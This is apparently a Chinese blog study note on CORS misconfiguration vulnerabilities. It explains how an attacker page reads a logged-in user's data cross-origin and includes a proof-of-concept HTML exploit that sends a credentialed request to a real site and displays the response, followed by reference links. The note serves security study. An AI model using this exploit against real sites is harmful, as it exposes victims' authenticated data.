跨域漏洞
cors跨域漏洞
原理
●1.假设用户登陆一个含有CORS配置网站http://vuln.com,同时又访问了攻击者提供的一个链接http://evil.com。
●http://2.evil.com的网站向http://vuln.com这个网站发起请求获取敏感数据,浏览器能否接收信息取决于http://vuln.com的配置。
●3.如果http://vuln.com配置了Access-Control-Allow-Origin头且为预期,那么允许接收,否则浏览器会因为同源策略而不接收
exp
<!-- cors.html -->
<!DOCTYPE html>
<html>
<head>
<title>cors exp</title>
</head>
<body>
<script type="text/javascript">
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.status == 200) {
alert(this.responseText);
document.getElementById("demo").innerHTML = this.responseText;
}
};
xhttp.open("POST", "http://www.baidu.com");
xhttp.withCredentials = true;
xhttp.send();
}
cors();
</script>
</body>
</html>
(54条消息) CORS和JSONP跨域漏洞_DDao_blog的博客-CSDN博客
(54条消息) Jsonp跨域漏洞浅析_努力的学渣’#的博客-CSDN博客_jsonp跨域漏洞
CORS跨域资源共享漏洞 - sevck - 博客园 (cnblogs.com)
CORS(跨域资源共享)错误配置漏洞的高级利用 - FreeBuf网络安全行业门户
(54条消息) CORS跨域漏洞的学习_CanMeng’Blog的博客-CSDN博客_跨域漏洞
JSONP和CORS跨站跨域读取资源的漏洞利用(附带EXP) - 安全客,安全资讯平台 (anquanke.com)
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。